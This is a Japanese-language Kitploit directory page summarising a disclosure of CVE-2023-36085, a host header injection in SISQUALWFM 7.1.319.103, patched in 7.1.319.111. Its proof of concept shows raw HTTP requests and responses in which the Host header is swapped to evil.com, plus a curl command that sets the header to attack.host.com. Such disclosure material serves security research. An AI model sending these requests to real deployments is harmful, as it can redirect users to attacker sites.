Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — このリポジトリには、SISQUALWFM バージョン 7.1.319.103 で発見されたホストヘッダーインジェクションの脆弱性 CVE-2023-36085 に関する情報が含まれています。この脆弱性により、攻撃者はウェブページのリンクを操作したり、ユーザーを悪意のあるサイトにリダイレクトしたりすることが可能になります。この脆弱性には CVE-2023-36085 が割り当てられており、バージョン 7.1.319.111 以上で修正されています。 | Kitploit
ツール/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

このリポジトリには、SISQUALWFM バージョン 7.1.319.103 で発見されたホストヘッダーインジェクションの脆弱性 CVE-2023-36085 に関する情報が含まれています。この脆弱性により、攻撃者はウェブページのリンクを操作したり、ユーザーを悪意のあるサイトにリダイレクトしたりすることが可能になります。この脆弱性には CVE-2023-36085 が割り当てられており、バージョン 7.1.319.111 以上で修正されています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2年前未レビュー

CVE-2023-36085 SISQUALWFM ホストヘッダーインジェクションの脆弱性

このリポジトリには、SISQUALWFM バージョン 7.1.319.103 で発見されたホストヘッダーインジェクションの脆弱性に関する情報が含まれています。この脆弱性により、攻撃者は Web ページのリンクを操作したり、ユーザーを悪意のあるサイトにリダイレクトしたりすることができます。この脆弱性には CVE-2023-36085 が割り当てられており、バージョン 7.1.319.111 以降で修正されています。

脆弱性の詳細

  • エクスプロイトタイトル: SISQUALWFM 7.1.319.103 ホストヘッダーインジェクション
  • 発見日: 17/03/2023
  • 報告日: 17/03/2023
  • 解決日: 13/10/2023
  • エクスプロイト作者: Omer Shaik (unknown_exploit)
  • ベンダーホームページ: SISQUALWFM
  • バージョン: 7.1.319.103
  • テスト環境: SISQUAL WFM 7.1.319.103
  • 影響を受けるバージョン: SISQUALWFM 7.1.319.103
  • 修正済みバージョン: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • CVSS スコア: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • カテゴリ: Web アプリ

概念実証 (PoC)

ホストヘッダーインジェクションの脆弱性を示す概念実証シナリオを提供します。具体的には /sisqualIdentityServer/core エンドポイントを対象としています。この脆弱性により、攻撃者はホストヘッダーを改ざんすることで Web ページのリンクを操作したり、ユーザーを別のサイトにリダイレクトしたりすることができます。

元のリクエスト

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

元のレスポンス

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

傍受したリクエスト(evil.com にリダイレクトするよう改変)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

レスポンス

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

エクスプロイトの実行

攻撃方法

この脆弱性を悪用するには、攻撃者は以下の curl コマンドを使用してホストヘッダーを改変できます:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

免責事項

このリポジトリは情報提供のみを目的としており、悪意のある活動に使用すべきではありません。この脆弱性はベンダーに責任を持って開示され、問題は解決済みです。脆弱性を特定および報告する際には、倫理的なハッキングのガイドラインに従い、責任ある開示の慣行を尊重することが重要です。

ツールをダウンロード